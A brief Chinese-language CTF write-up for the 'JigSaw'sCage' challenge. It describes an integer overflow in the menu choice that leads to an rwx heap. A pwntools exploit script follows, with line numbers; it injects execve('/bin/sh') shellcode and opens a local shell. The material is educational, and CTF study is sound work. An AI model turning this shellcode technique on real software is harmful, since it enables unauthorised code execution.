JigSaw’sCage
开始菜单 make choice 输入有个整形溢出,将 v4 改得比 0xe 大,进入 else 分支 mprotect 给 heap 段加上 rwx 权限
test 运行 shellcode rdx 是堆地址,利用这个将 /bin/sh 地址传到 rdi ,然后 syscall getshell
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| from pwn import *
context.log_level = 'debug'
e = ELF("./JigSAW")
context.binary = e
p = process(['./JigSAW'])
def add(idx):
p.sendlineafter('Choice : ','1')
p.sendlineafter('Index? : ',str(idx))
def edit(idx,content):
p.sendlineafter('Choice : ','2')
p.sendlineafter('Index? : ',str(idx))
p.sendafter('iNput:', content)
def delete(idx):
p.sendlineafter('Choice : ','3')
p.sendlineafter('Index? : ',str(idx))
def test(idx):
p.sendlineafter('Choice : ','4')
p.sendlineafter('Index? : ',str(idx))
p.sendafter('Name:\n','PWN')
p.sendlineafter('Choice:',str(0xE<<32))
p.sendlineafter('Choice:',str(0))
add(0)
add(1)
edit(1,'/bin/sh\x00')
payload = asm('add dl,0x20;push rsi;pop rdi;xchg rdi,rdx;push rsi;pop rax;mov al,59;syscall;')
edit(0,payload)
gdb.attach(p,"b *$rebase(0x1D32)")
raw_input()
sleep(0.2)
test(0)
p.interactive()
if __name__ == '__main__':
pass
|
